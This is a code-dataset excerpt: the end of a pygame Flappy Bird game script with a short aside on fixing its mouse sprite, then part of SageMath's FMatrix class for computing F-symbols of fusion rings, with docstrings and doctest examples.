Coritiba - MEGA FUNK 2019.mp3'\nribamar = 'music/HOJE TEM GOL DO RIBAMAR - MC NANDINHO by Pitter Correa ((Audio Oficial)).mp3'\nazeitona = 'music/dj azeitona.mp3'\npressao = 'music/PRESSÃO NENÉM (completo).mp3'\nvale = 'music/VALE NADA VALE TUDO.mp3'\n\n\nwhile gameloop:\n clock.tick(60)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n gameloop = False\n\n if event.type == pygame.MOUSEBUTTONDOWN:\n movement = 0\n movement -= 7\n gameover = False\n gamestart = True\n\n if pygame.sprite.collide_mask(mouse, conf):\n conf_tela = True\n\n if pygame.sprite.collide_mask(mouse, back):\n conf_tela = False\n gamestart = False\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_1:\n pygame.mixer.music.load(coxa)\n pygame.mixer.music.play(-1)\n\n if event.key == pygame.K_2:\n pygame.mixer.music.load(pressao)\n pygame.mixer.music.play(-1)\n\n if event.key == pygame.K_3:\n pygame.mixer.music.load(vale)\n pygame.mixer.music.play(-1)\n\n if event.key == pygame.K_4:\n pygame.mixer.music.load(ribamar)\n pygame.mixer.music.play(-1)\n\n if event.key == pygame.K_5:\n pygame.mixer.music.load(azeitona)\n pygame.mixer.music.play(-1)\n\n\n\n\n\n screen.blit(fundo, (0, 0))\n\n if conf_tela:\n\n screen.blit(fundo_conf, (0, 0))\n\n backGroup.draw(screen)\n else:\n\n\n if not gamestart:\n screen.blit(start_png, (100,100))\n confGroup.draw(screen)\n mouseGroup.draw(screen)\n mouseGroup.update()\n\n if gamestart:\n\n if not gameover:\n\n\n #draw\n canoGroup.draw(screen)\n canoGroup.update()\n\n screen.blit(chao1, 
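`Mouse.update` above replaces `self.rect` with the bare `(x, y)` tuple from `pygame.mouse.get_pos()`; that happens to work for `blit` and for `collide_mask`'s `rect[0]`/`rect[1]` indexing, but it silently discards the Rect and its size. Moving the existing Rect is the idiomatic fix — a sketch, with a plain Surface standing in for `mouse.png`:

import pygame

class Mouse(pygame.sprite.Sprite):
    def __init__(self, *groups):
        super().__init__(*groups)
        self.image = pygame.Surface((15, 20))      # stand-in for mouse.png
        self.rect = self.image.get_rect()

    def update(self, *args):
        # move the Rect in place instead of replacing it with a tuple
        self.rect.topleft = pygame.mouse.get_pos()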
(chao1_x, chao1_y))\n screen.blit(chao2, (chao2_x, chao2_y))\n\n bird_group.draw(screen)\n bird_group.update()\n\n\n movement += gravity\n bird.rect.y += movement\n\n\n #move chao\n\n chao1_x += -2\n chao2_x += -2\n\n if chao1_x <= -500:\n chao1_x = 494\n if chao2_x <= -500:\n chao2_x = 494\n\n\n #cano\n\n time +=1\n if time == 65:\n novo_cano = Cano(canoGroup)\n tamanho = 500 - novo_cano.rect.top\n novo_cano_top = Cano_top(canoGroup, x=-520 + novo_cano.rect.top)\n time = 0\n\n\n\n #placar\n for cano in canoGroup.spritedict:\n if cano.rect.x == 50:\n placar += 0.5\n\n placar_txt = str(placar).replace('.0', '')\n text_surface = base_font.render(placar_txt, True, (255, 255, 255))\n screen.blit(text_surface, (200, 0))\n\n placar_final = placar\n\n\n\n #colisao\n\n if pygame.sprite.spritecollide(bird, canoGroup, False, pygame.sprite.collide_mask):\n print('bateu')\n gameover = True\n\n if bird.rect.bottom >= altura - 70:\n gameover = True\n\n if bird.rect.top <= 0:\n gameover = True\n\n if gameover:\n screen.blit(gameover_png, (largura//2 - 150, altura//2 - 50))\n regame_txt = 'tap to play again'\n text_regame_surface = base_font_regame.render(regame_txt, True, (0, 0, 0))\n screen.blit(text_regame_surface, (130, 390))\n\n placar_final_txt = str(placar_final).replace('.0', '')\n text_surface = base_font_placar_gameover.render(placar_final_txt, True, (255, 255, 255))\n screen.blit(text_surface, (220, 100))\n\n\n bird.rect.center = (50, 315)\n canoGroup.empty()\n\n placar_time = 0\n placar = 0\n\n backGroup.draw(screen)\n\n #fim game screen\n pygame.display.update()\n\n\n #mouse\n\n\n mouseGroup.draw(screen)\n mouseGroup.update()\n\n\n #fim start screen\n pygame.display.update()\n\n\n\n","repo_name":"theohillmann/flappy-bird","sub_path":"flappy bird/flappy_bird/flappy birdV2.0 - Copia.pyw","file_name":"flappy birdV2.0 - Copia.pyw","file_ext":"pyw","file_size_in_byte":8271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70150647160","text":"r\"\"\"\nThe F-Matrix of a Fusion Ring\n\"\"\"\n# ****************************************************************************\n# Copyright (C) 2019 Daniel Bump \n# Guillermo Aboumrad \n# Travis Scrimshaw \n# Galit Anikeeva \n#\n# Distributed under the terms of the GNU General Public License (GPL)\n# https://www.gnu.org/licenses/\n# ****************************************************************************\n\n\nfrom copy import deepcopy\nfrom ctypes import cast, py_object\nfrom itertools import product, zip_longest\nfrom multiprocessing import Pool, cpu_count, set_start_method, shared_memory\nimport numpy as np\nfrom os import getpid, remove\nimport pickle\n\nfrom sage.algebras.fusion_rings.fast_parallel_fmats_methods import (\n _backward_subs, _solve_for_linear_terms,\n executor\n)\nfrom sage.algebras.fusion_rings.poly_tup_engine import (\n apply_coeff_map, constant_coeff,\n compute_known_powers,\n get_variables_degrees, variables,\n poly_to_tup, _tup_to_poly, tup_to_univ_poly,\n _unflatten_coeffs,\n poly_tup_sortkey,\n resize\n)\nfrom sage.algebras.fusion_rings.shm_managers import KSHandler, FvarsHandler\nfrom sage.graphs.graph import Graph\nfrom sage.matrix.constructor import matrix\nfrom sage.misc.misc import get_main_globals\nfrom sage.rings.ideal import Ideal\nfrom sage.structure.sage_object import SageObject\nfrom sage.rings.polynomial.polynomial_ring_constructor import PolynomialRing\nfrom sage.rings.polynomial.polydict import ETuple\nfrom sage.rings.qqbar import AA, QQbar, 
number_field_elements_from_algebraics\n\nclass FMatrix(SageObject):\n r\"\"\"\n An F-matrix for a :class:`FusionRing`.\n\n INPUT:\n\n - ``FR`` -- a :class:`FusionRing`\n - ``fusion_label`` -- (optional) a string used to label basis elements\n of the :class:`FusionRing` associated to ``self``\n (see :meth:`FusionRing.fusion_labels`)\n - ``var_prefix`` -- (optional) a string indicating the desired prefix\n for variables denoting F-symbols to be solved\n - ``inject_variables`` -- (default: ``False``) a boolean indicating\n whether to inject variables (:class:`FusionRing` basis element\n labels and F-symbols) into the global namespace\n\n The :class:`FusionRing` or Verlinde algebra is the\n Grothendieck ring of a modular tensor category [BaKi2001]_.\n Such categories arise in conformal field theory or in the\n representation theories of affine Lie algebras, or\n quantum groups at roots of unity. They have applications\n to low dimensional topology and knot theory, to conformal\n field theory and to topological quantum computing. The\n :class:`FusionRing` captures much information about a fusion\n category, but to complete the picture, the F-matrices or\n 6j-symbols are needed. For example these are required in\n order to construct braid group representations. This\n can be done using the :class:`FusionRing` method\n :meth:`FusionRing.get_braid_generators`, which uses\n the F-matrix.\n\n We only undertake to compute the F-matrix if the\n :class:`FusionRing` is *multiplicity free* meaning that\n the Fusion coefficients `N^{ij}_k` are bounded\n by 1. For Cartan Types `X_r` and level `k`,\n the multiplicity-free cases are given by the\n following table.\n\n +------------------------+----------+\n | Cartan Type | `k` |\n +========================+==========+\n | `A_1` | any |\n +------------------------+----------+\n | `A_r, r\\geq 2` | `\\leq 2` |\n +------------------------+----------+\n | `B_r, r\\geq 2` | `\\leq 2` |\n +------------------------+----------+\n | `C_2` | `\\leq 2` |\n +------------------------+----------+\n | `C_r, r\\geq 3` | `\\leq 1` |\n +------------------------+----------+\n | `D_r, r\\geq 4` | `\\leq 2` |\n +------------------------+----------+\n | `G_2, F_4, E_6, E_7` | `\\leq 2` |\n +------------------------+----------+\n | `E_8` | `\\leq 3` |\n +------------------------+----------+\n\n Beyond this limitation, computation of the F-matrix\n can involve very large systems of equations. A\n rule of thumb is that this code can compute the\n F-matrix for systems with `\\leq 14` simple objects\n (primary fields) on a machine with 16 GB of memory.\n (Larger examples can be quite time consuming.)\n\n The :class:`FusionRing` and its methods capture much\n of the structure of the underlying tensor category.\n But an important aspect that is not encoded in the\n fusion ring is the associator, which is a homomorphism\n `(A\\otimes B)\\otimes C\\to A\\otimes(B\\otimes C)` that\n requires an additional tool, the F-matrix or 6j-symbol.\n To specify this, we fix a simple object `D`\n and represent the transformation\n\n .. MATH::\n\n \\text{Hom}(D, (A\\otimes B)\\otimes C)\n \\to \\text{Hom}(D, A\\otimes(B\\otimes C))\n\n by a matrix `F^{ABC}_D`. This depends on a pair of\n additional simple objects `X` and `Y`. 
Indeed, we can\n    get a basis for `\text{Hom}(D, (A\otimes B)\otimes C)`\n    indexed by simple objects `X` in which the corresponding\n    homomorphism factors through `X\otimes C`, and similarly\n    `\text{Hom}(D, A\otimes(B\otimes C))` has a basis indexed\n    by `Y`, in which the basis vector factors through `A\otimes Y`.\n\n    See [TTWL2009]_ for an introduction to this topic,\n    [EGNO2015]_ Section 4.9 for a precise mathematical\n    definition, and [Bond2007]_ Section 2.5 for a discussion\n    of how to compute the F-matrix. In addition to\n    [Bond2007]_, worked-out F-matrices may be found in\n    [RoStWa2009]_ and [CHW2015]_.\n\n    The F-matrix is only determined up to a *gauge*. This\n    is a family of embeddings `C \to A\otimes B` for\n    simple objects `A, B, C` such that `\text{Hom}(C, A\otimes B)`\n    is nonzero. Changing the gauge changes the F-matrix though\n    not in a very essential way. By varying the gauge it is\n    possible to make the F-matrices unitary, or it is possible\n    to make them cyclotomic.\n\n    Due to the large number of equations we may fail to find a\n    Groebner basis if there are too many variables.\n\n    EXAMPLES::\n\n        sage: I = FusionRing(\"E8\", 2, conjugate=True)\n        sage: I.fusion_labels([\"i0\", \"p\", \"s\"], inject_variables=True)\n        sage: f = I.get_fmatrix(inject_variables=True); f\n        creating variables fx1..fx14\n        Defining fx0, fx1, fx2, fx3, fx4, fx5, fx6, fx7, fx8, fx9, fx10, fx11, fx12, fx13\n        F-Matrix factory for The Fusion Ring of Type E8 and level 2 with Integer Ring coefficients\n\n    We have injected two sets of variables into the global namespace.\n    We created three variables ``i0, p, s`` to represent the\n    primary fields (simple elements) of the :class:`FusionRing`. Creating\n    the :class:`FMatrix` factory also created variables\n    ``fx1, fx2, ..., fx14`` in order to solve the hexagon and pentagon\n    equations describing the F-matrix. Since we called :class:`FMatrix`\n    with the parameter ``inject_variables=True``, these have been injected\n    into the global namespace. This is not necessary for the code to work,\n    but if you want to run the code experimentally you may want access\n    to these variables.\n\n    EXAMPLES::\n\n        sage: f.fmatrix(s, s, s, s)\n        [fx10 fx11]\n        [fx12 fx13]\n\n    The F-matrix has not been computed at this stage, so\n    the F-matrix `F^{sss}_s` is filled with variables\n    ``fx10``, ``fx11``, ``fx12``, ``fx13``. The task is\n    to solve for these.\n\n    As explained above, the F-matrix `(F^{ABC}_D)_{X, Y}` involves\n    two other variables `X` and `Y`. We have methods to\n    tell us (depending on `A, B, C, D`) what the possibilities\n    for these are. In this example with `A=B=C=D=s`,\n    both `X` and `Y` are allowed to be `i_0` or `p`.\n\n    ::\n\n        sage: f.f_from(s, s, s, s), f.f_to(s, s, s, s)\n        ([i0, p], [i0, p])\n\n    The last two statements show that the possible values of\n    `X` and `Y` when `A = B = C = D = s` are `i_0` and `p`.\n\n    The F-matrix is computed by solving the so-called\n    pentagon and hexagon equations. The *pentagon equations*\n    reflect the Mac Lane pentagon axiom in the definition\n    of a monoidal category. The hexagon relations\n    reflect the axioms of a *braided monoidal category*,\n    which are constraints on both the F-matrix and on\n    the R-matrix. 
Optionally, orthogonality constraints\n may be imposed to obtain an orthogonal F-matrix.\n\n ::\n\n sage: sorted(f.get_defining_equations(\"pentagons\"))[1:3]\n [fx9*fx12 - fx2*fx13, fx4*fx11 - fx2*fx13]\n sage: sorted(f.get_defining_equations(\"hexagons\"))[1:3]\n [fx6 - 1, fx2 + 1]\n sage: sorted(f.get_orthogonality_constraints())[1:3]\n [fx10*fx11 + fx12*fx13, fx10*fx11 + fx12*fx13]\n\n There are two methods available to compute an F-matrix.\n The first, :meth:`find_cyclotomic_solution` uses only\n the pentagon and hexagon relations. The second,\n :meth:`find_orthogonal_solution` uses additionally\n the orthogonality relations. There are some differences\n that should be kept in mind.\n\n :meth:`find_cyclotomic_solution` currently works only with\n smaller examples. For example the :class:`FusionRing` for `G_2`\n at level 2 is too large. When it is available, this method\n produces an F-matrix whose entries are in the same\n cyclotomic field as the underlying :class:`FusionRing`. ::\n\n sage: f.find_cyclotomic_solution()\n Setting up hexagons and pentagons...\n Finding a Groebner basis...\n Solving...\n Fixing the gauge...\n adding equation... fx1 - 1\n adding equation... fx11 - 1\n Done!\n\n We now have access to the values of the F-matrix using\n the methods :meth:`fmatrix` and :meth:`fmat`::\n\n sage: f.fmatrix(s, s, s, s)\n [(-1/2*zeta128^48 + 1/2*zeta128^16) 1]\n [ 1/2 (1/2*zeta128^48 - 1/2*zeta128^16)]\n sage: f.fmat(s, s, s, s, p, p)\n (1/2*zeta128^48 - 1/2*zeta128^16)\n\n :meth:`find_orthogonal_solution` is much more powerful\n and is capable of handling large cases, sometimes\n quickly but sometimes (in larger cases) after hours of\n computation. Its F-matrices are not always in the\n cyclotomic field that is the base ring of the underlying\n :class:`FusionRing`, but sometimes in an extension field adjoining\n some square roots. When this happens, the :class:`FusionRing` is\n modified, adding an attribute ``_basecoer`` that is\n a coercion from the cyclotomic field to the field\n containing the F-matrix. The field containing the F-matrix\n is available through :meth:`field`. 
::\n\n sage: f = FusionRing(\"B3\", 2).get_fmatrix()\n sage: f.find_orthogonal_solution(verbose=False, checkpoint=True) # not tested (~100 s)\n sage: all(v in CyclotomicField(56) for v in f.get_fvars().values()) # not tested\n True\n\n sage: f = FusionRing(\"G2\", 2).get_fmatrix()\n sage: f.find_orthogonal_solution(verbose=False) # long time (~11 s)\n sage: f.field() # long time\n Algebraic Field\n \"\"\"\n def __init__(self, fusion_ring, fusion_label=\"f\", var_prefix='fx', inject_variables=False):\n r\"\"\"\n Initialize ``self``.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"B3\", 2).get_fmatrix()\n sage: TestSuite(f).run(skip=\"_test_pickling\")\n \"\"\"\n self._FR = fusion_ring\n if inject_variables and (self._FR._fusion_labels is None):\n self._FR.fusion_labels(fusion_label, inject_variables=True)\n if not self._FR.is_multiplicity_free():\n raise NotImplementedError(\"FMatrix is only available for multiplicity free FusionRings\")\n # Set up F-symbols entry by entry\n n_vars = self.findcases()\n self._poly_ring = PolynomialRing(self._FR.field(), n_vars, var_prefix)\n if inject_variables:\n print(\"creating variables %s%s..%s%s\"%(var_prefix, 1, var_prefix, n_vars))\n self._poly_ring.inject_variables(get_main_globals())\n self._idx_to_sextuple, self._fvars = self.findcases(output=True)\n\n # Base field attributes\n self._field = self._FR.field()\n r = self._field.defining_polynomial().roots(ring=QQbar, multiplicities=False)[0]\n self._qqbar_embedding = self._field.hom([r], QQbar)\n\n # Warm starting\n self._chkpt_status = -1\n\n # Multiprocessing attributes\n self.mp_thresh = 10000\n self.pool = None\n\n #######################\n ### Class utilities ###\n #######################\n\n def _repr_(self):\n \"\"\"\n Return a string representation of ``self``.\n\n EXAMPLES::\n\n sage: FusionRing(\"B2\", 1).get_fmatrix()\n F-Matrix factory for The Fusion Ring of Type B2 and level 1 with Integer Ring coefficients\n \"\"\"\n return \"F-Matrix factory for %s\"%self._FR\n\n def clear_equations(self):\n r\"\"\"\n Clear the list of equations to be solved.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"E6\", 1).get_fmatrix()\n sage: f.get_defining_equations('hexagons', output=False)\n sage: len(f.ideal_basis)\n 6\n sage: f.clear_equations()\n sage: len(f.ideal_basis) == 0\n True\n \"\"\"\n self.ideal_basis = []\n\n def clear_vars(self):\n r\"\"\"\n Reset the F-symbols.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"C4\", 1).get_fmatrix()\n sage: fvars = f.get_fvars()\n sage: some_key = sorted(fvars)[0]\n sage: fvars[some_key]\n fx0\n sage: fvars[some_key] = 1\n sage: f.get_fvars()[some_key]\n 1\n sage: f.clear_vars()\n sage: f.get_fvars()[some_key]\n fx0\n \"\"\"\n self._fvars = {t: self._poly_ring.gen(idx) for idx, t in self._idx_to_sextuple.items()}\n self._solved = [False] * self._poly_ring.ngens()\n\n def _reset_solver_state(self):\n r\"\"\"\n Reset solver state and clear relevant cache.\n\n Used to ensure state variables are the same for each\n orthogonal solver run.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"G2\", 1).get_fmatrix()\n sage: f._reset_solver_state()\n sage: K = f.field()\n sage: len(f._nnz.nonzero_positions())\n 1\n sage: f.find_orthogonal_solution(verbose=False)\n sage: K == f.field()\n False\n sage: f._reset_solver_state()\n sage: K == f.field()\n True\n sage: f.FR()._basecoer is None\n True\n sage: f._poly_ring.base_ring() == K\n True\n sage: sum(f._solved) == 0\n True\n sage: len(f.ideal_basis) == 0\n True\n sage: for k, v in f._ks.items():\n ....: k\n sage: len(f._nnz.nonzero_positions()) == 
1\n True\n sage: all(len(x.q_dimension.cache) == 0 for x in f.FR().basis())\n True\n sage: len(f.FR().r_matrix.cache) == 0\n True\n sage: len(f.FR().s_ij.cache) == 0\n True\n \"\"\"\n self._FR._basecoer = None\n self._field = self._FR.field()\n self._non_cyc_roots = []\n self._poly_ring = self._poly_ring.change_ring(self._field)\n self._chkpt_status = -1\n self.clear_vars()\n self.clear_equations()\n n = self._poly_ring.ngens()\n self._var_degs = [0] * n\n self._kp = {}\n self._ks = KSHandler(n, self._field)\n self._singles = self.get_fvars_by_size(1, indices=True)\n self._nnz = self._get_known_nonz()\n\n # Clear relevant caches\n [x.q_dimension.clear_cache() for x in self._FR.basis()]\n self._FR.r_matrix.clear_cache()\n self._FR.s_ij.clear_cache()\n\n def fmat(self, a, b, c, d, x, y, data=True):\n r\"\"\"\n Return the F-Matrix coefficient `(F^{a, b, c}_d)_{x, y}`.\n\n EXAMPLES::\n\n sage: fr = FusionRing(\"G2\", 1, fusion_labels=(\"i0\", \"t\"), inject_variables=True)\n sage: f = fr.get_fmatrix()\n sage: [f.fmat(t, t, t, t, x, y) for x in fr.basis() for y in fr.basis()]\n [fx1, fx2, fx3, fx4]\n sage: f.find_cyclotomic_solution(output=True)\n Setting up hexagons and pentagons...\n Finding a Groebner basis...\n Solving...\n Fixing the gauge...\n adding equation... fx2 - 1\n Done!\n {(t, t, t, i0, t, t): 1,\n (t, t, t, t, i0, i0): (-zeta60^14 + zeta60^6 + zeta60^4 - 1),\n (t, t, t, t, i0, t): 1,\n (t, t, t, t, t, i0): (-zeta60^14 + zeta60^6 + zeta60^4 - 1),\n (t, t, t, t, t, t): (zeta60^14 - zeta60^6 - zeta60^4 + 1)}\n sage: [f.fmat(t, t, t, t, x, y) for x in f._FR.basis() for y in f._FR.basis()]\n [(-zeta60^14 + zeta60^6 + zeta60^4 - 1),\n 1,\n (-zeta60^14 + zeta60^6 + zeta60^4 - 1),\n (zeta60^14 - zeta60^6 - zeta60^4 + 1)]\n \"\"\"\n if (self._FR.Nk_ij(a, b, x) == 0 or self._FR.Nk_ij(x, c, d) == 0\n or self._FR.Nk_ij(b, c, y) == 0 or self._FR.Nk_ij(a, y, d) == 0):\n return 0\n\n # Some known zero F-symbols\n if a == self._FR.one():\n if x == b and y == d:\n return 1\n else:\n return 0\n if b == self._FR.one():\n if x == a and y == c:\n return 1\n else:\n return 0\n if c == self._FR.one():\n if x == d and y == b:\n return 1\n else:\n return 0\n if data:\n # Better to use try/except for speed. Somewhat trivial, but worth\n # hours when method is called ~10^11 times\n try:\n return self._fvars[a, b, c, d, x, y]\n except KeyError:\n return 0\n else:\n return (a, b, c, d, x, y)\n\n def fmatrix(self, a, b, c, d):\n r\"\"\"\n Return the F-Matrix `F^{a, b, c}_d`.\n\n INPUT:\n\n - ``a, b, c, d`` -- basis elements of the associated :class:`FusionRing`\n\n EXAMPLES::\n\n sage: fr = FusionRing(\"A1\", 2, fusion_labels=\"c\", inject_variables=True)\n sage: f = fr.get_fmatrix(new=True)\n sage: f.fmatrix(c1, c1, c1, c1)\n [fx0 fx1]\n [fx2 fx3]\n sage: f.find_cyclotomic_solution(verbose=False);\n adding equation... fx4 - 1\n adding equation... 
fx10 - 1\n sage: f.f_from(c1, c1, c1, c1)\n [c0, c2]\n sage: f.f_to(c1, c1, c1, c1)\n [c0, c2]\n sage: f.fmatrix(c1, c1, c1, c1)\n [ (1/2*zeta32^12 - 1/2*zeta32^4) (-1/2*zeta32^12 + 1/2*zeta32^4)]\n [ (1/2*zeta32^12 - 1/2*zeta32^4) (1/2*zeta32^12 - 1/2*zeta32^4)]\n \"\"\"\n X = self.f_from(a, b, c, d)\n Y = self.f_to(a, b, c, d)\n return matrix([[self.fmat(a, b, c, d, x, y) for y in Y] for x in X])\n\n def field(self):\n r\"\"\"\n Return the base field containing the F-symbols.\n\n When ``self`` is initialized, the field is set to be the\n cyclotomic field of the :class:`FusionRing` associated\n to ``self``.\n\n The field may change after running :meth:`find_orthogonal_solution`.\n At that point, this method could return the\n associated :class:`FusionRing`'s cyclotomic field, an\n appropriate :func:`NumberField` that was computed on the fly\n by the F-matrix solver, or the :class:`QQbar`.\n\n Depending on the ``CartanType`` of ``self``, the solver may need\n to compute an extension field containing certain square roots that\n do not belong to the associated :class:`FusionRing`'s cyclotomic field.\n\n In certain cases we revert to :class:`QQbar` because\n the extension field computation does not seem to terminate. See\n :meth:`attempt_number_field_computation` for more details.\n\n The method :meth:`get_non_cyclotomic_roots` returns a list of\n roots defining the extension of the :class:`FusionRing`'s\n cyclotomic field needed to contain all F-symbols.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"G2\", 1).get_fmatrix()\n sage: f.field()\n Cyclotomic Field of order 60 and degree 16\n sage: f.find_orthogonal_solution(verbose=False)\n sage: f.field()\n Number Field in a with defining polynomial y^32 - ... - 22*y^2 + 1\n sage: phi = f.get_qqbar_embedding()\n sage: [phi(r).n() for r in f.get_non_cyclotomic_roots()]\n [-0.786151377757423 - 8.92806368517581e-31*I]\n\n .. 
NOTE::\n\n Consider using ``self.field().optimized_representation()`` to\n obtain an equivalent :func:`NumberField` with a defining\n polynomial with smaller coefficients, for a more efficient\n element representation.\n \"\"\"\n return self._field\n\n def FR(self):\n r\"\"\"\n Return the :class:`FusionRing` associated to ``self``.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"D3\", 1).get_fmatrix()\n sage: f.FR()\n The Fusion Ring of Type D3 and level 1 with Integer Ring coefficients\n \"\"\"\n return self._FR\n\n def findcases(self, output=False):\n r\"\"\"\n Return unknown F-matrix entries.\n\n If run with ``output=True``,\n this returns two dictionaries; otherwise it just returns the\n number of unknown values.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"G2\", 1, fusion_labels=(\"i0\", \"t\")).get_fmatrix()\n sage: f.findcases()\n 5\n sage: f.findcases(output=True)\n ({0: (t, t, t, i0, t, t),\n 1: (t, t, t, t, i0, i0),\n 2: (t, t, t, t, i0, t),\n 3: (t, t, t, t, t, i0),\n 4: (t, t, t, t, t, t)},\n {(t, t, t, i0, t, t): fx0,\n (t, t, t, t, i0, i0): fx1,\n (t, t, t, t, i0, t): fx2,\n (t, t, t, t, t, i0): fx3,\n (t, t, t, t, t, t): fx4})\n \"\"\"\n i = 0\n if output:\n idx_map = dict()\n ret = dict()\n id_anyon = self._FR.one()\n for (a, b, c, d) in product(self._FR.basis(), repeat=4):\n if a == id_anyon or b == id_anyon or c == id_anyon:\n continue\n for x in self.f_from(a, b, c, d):\n for y in self.f_to(a, b, c, d):\n if output:\n v = self._poly_ring.gen(i)\n ret[(a, b, c, d, x, y)] = v\n idx_map[i] = (a, b, c, d, x, y)\n i += 1\n if output:\n return idx_map, ret\n else:\n return i\n\n def f_from(self, a, b, c, d):\n r\"\"\"\n Return the possible `x` such that there are morphisms\n `d \\to x \\otimes c \\to (a \\otimes b) \\otimes c`.\n\n INPUT:\n\n - ``a, b, c, d`` -- basis elements of the associated :class:`FusionRing`\n\n EXAMPLES::\n\n sage: fr = FusionRing(\"A1\", 3, fusion_labels=\"a\", inject_variables=True)\n sage: f = fr.get_fmatrix()\n sage: f.fmatrix(a1, a1, a2, a2)\n [fx6 fx7]\n [fx8 fx9]\n sage: f.f_from(a1, a1, a2, a2)\n [a0, a2]\n sage: f.f_to(a1, a1, a2, a2)\n [a1, a3]\n \"\"\"\n return [x for x in self._FR.basis()\n if self._FR.Nk_ij(a, b, x) != 0 and self._FR.Nk_ij(x, c, d) != 0]\n\n def f_to(self, a, b, c, d):\n r\"\"\"\n Return the possible `y` such that there are morphisms\n `d \\to a \\otimes y \\to a \\otimes (b \\otimes c)`.\n\n INPUT:\n\n - ``a, b, c, d`` -- basis elements of the associated :class:`FusionRing`\n\n EXAMPLES::\n\n sage: b22 = FusionRing(\"B2\", 2)\n sage: b22.fusion_labels(\"b\", inject_variables=True)\n sage: B = b22.get_fmatrix()\n sage: B.fmatrix(b2, b4, b2, b4)\n [fx266 fx267 fx268]\n [fx269 fx270 fx271]\n [fx272 fx273 fx274]\n sage: B.f_from(b2, b4, b2, b4)\n [b1, b3, b5]\n sage: B.f_to(b2, b4, b2, b4)\n [b1, b3, b5]\n \"\"\"\n return [y for y in self._FR.basis()\n if self._FR.Nk_ij(b, c, y) != 0 and self._FR.Nk_ij(a, y, d) != 0]\n\n ####################\n ### Data getters ###\n ####################\n\n def get_fvars(self):\n r\"\"\"\n Return a dictionary of F-symbols.\n\n The keys are sextuples `(a, b, c, d, x, y)` of basis elements of\n ``self.FR()`` and the values are the corresponding F-symbols\n `(F^{a, b, c}_d)_{xy}`.\n\n These values reflect the current state of a solver's computation.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"A2\", 1).get_fmatrix(inject_variables=True)\n creating variables fx1..fx8\n Defining fx0, fx1, fx2, fx3, fx4, fx5, fx6, fx7\n sage: f.get_fvars()[(f1, f1, f1, f0, f2, f2)]\n fx0\n sage: 
f.find_orthogonal_solution(verbose=False)\n sage: f.get_fvars()[(f1, f1, f1, f0, f2, f2)]\n 1\n \"\"\"\n return self._fvars\n\n def get_poly_ring(self):\n r\"\"\"\n Return the polynomial ring whose generators denote the desired F-symbols.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"B6\", 1).get_fmatrix()\n sage: f.get_poly_ring()\n Multivariate Polynomial Ring in fx0, ..., fx13 over\n Cyclotomic Field of order 96 and degree 32\n \"\"\"\n return self._poly_ring\n\n # TODO: this method is incredibly slow... improve by keeping track of the cyclotomic polynomials, NOT their roots in QQbar\n def get_non_cyclotomic_roots(self):\n r\"\"\"\n Return a list of roots that define the extension of the associated\n :class:`FusionRing`'s base\n :class:`Cyclotomic field`,\n containing all the F-symbols.\n\n OUTPUT:\n\n The list of non-cyclotomic roots is given as a list of elements of the\n field returned by :meth:`field()`.\n\n If ``self.field() == self.FR().field()`` then this method\n returns an empty list.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"E6\", 1).get_fmatrix()\n sage: f.find_orthogonal_solution(verbose=False)\n sage: f.field() == f.FR().field()\n True\n sage: f.get_non_cyclotomic_roots()\n []\n sage: f = FusionRing(\"G2\", 1).get_fmatrix()\n sage: f.find_orthogonal_solution(verbose=False)\n sage: f.field() == f.FR().field()\n False\n sage: phi = f.get_qqbar_embedding()\n sage: [phi(r).n() for r in f.get_non_cyclotomic_roots()]\n [-0.786151377757423 - 8.92806368517581e-31*I]\n\n When ``self.field()`` is a ``NumberField``, one may use\n :meth:`get_qqbar_embedding` to embed the resulting values into\n :class:`QQbar`.\n \"\"\"\n return sorted(set(self._non_cyc_roots))\n\n def get_qqbar_embedding(self):\n r\"\"\"\n Return an embedding from the base field containing F-symbols (the\n associated :class:`FusionRing`'s\n :class:`Cyclotomic field`,\n a :func:`NumberField`, or :class:`QQbar`) into\n :class:`QQbar`.\n\n This embedding is useful for getting a better sense for the\n F-symbols, particularly when they are computed as elements of a\n :func:`NumberField`. See also :meth:`get_non_cyclotomic_roots`.\n\n EXAMPLES::\n\n sage: fr = FusionRing(\"G2\", 1)\n sage: f = fr.get_fmatrix(fusion_label=\"g\", inject_variables=True, new=True)\n creating variables fx1..fx5\n Defining fx0, fx1, fx2, fx3, fx4\n sage: f.find_orthogonal_solution()\n Computing F-symbols for The Fusion Ring of Type G2 and level 1 with Integer Ring coefficients with 5 variables...\n Set up 10 hex and orthogonality constraints...\n Partitioned 10 equations into 2 components of size:\n [4, 1]\n Elimination epoch completed... 
0 eqns remain in ideal basis\n Hex elim step solved for 4 / 5 variables\n Set up 0 reduced pentagons...\n Pent elim step solved for 4 / 5 variables\n Partitioned 0 equations into 0 components of size:\n []\n Partitioned 1 equations into 1 components of size:\n [1]\n Computing appropriate NumberField...\n sage: phi = f.get_qqbar_embedding()\n sage: phi(f.fmat(g1, g1, g1, g1, g1, g1)).n()\n -0.618033988749895 + 1.46674215951686e-29*I\n \"\"\"\n return self._qqbar_embedding\n\n def get_coerce_map_from_fr_cyclotomic_field(self):\n r\"\"\"\n Return a coercion map from the associated :class:`FusionRing`'s\n cyclotomic field into the base field containing all F-symbols\n (this could be the :class:`FusionRing`'s\n :class:`Cyclotomic field`,\n a :func:`NumberField`, or :class:`QQbar`).\n\n EXAMPLES::\n\n sage: f = FusionRing(\"G2\", 1).get_fmatrix()\n sage: f.find_orthogonal_solution(verbose=False)\n sage: f.FR().field()\n Cyclotomic Field of order 60 and degree 16\n sage: f.field()\n Number Field in a with defining polynomial y^32 - ... - 22*y^2 + 1\n sage: phi = f.get_coerce_map_from_fr_cyclotomic_field()\n sage: phi.domain() == f.FR().field()\n True\n sage: phi.codomain() == f.field()\n True\n\n When F-symbols are computed as elements of the associated\n :class:`FusionRing`'s base\n :class:`Cyclotomic field`,\n we have ``self.field() == self.FR().field()`` and this\n returns the identity map on ``self.field()``. 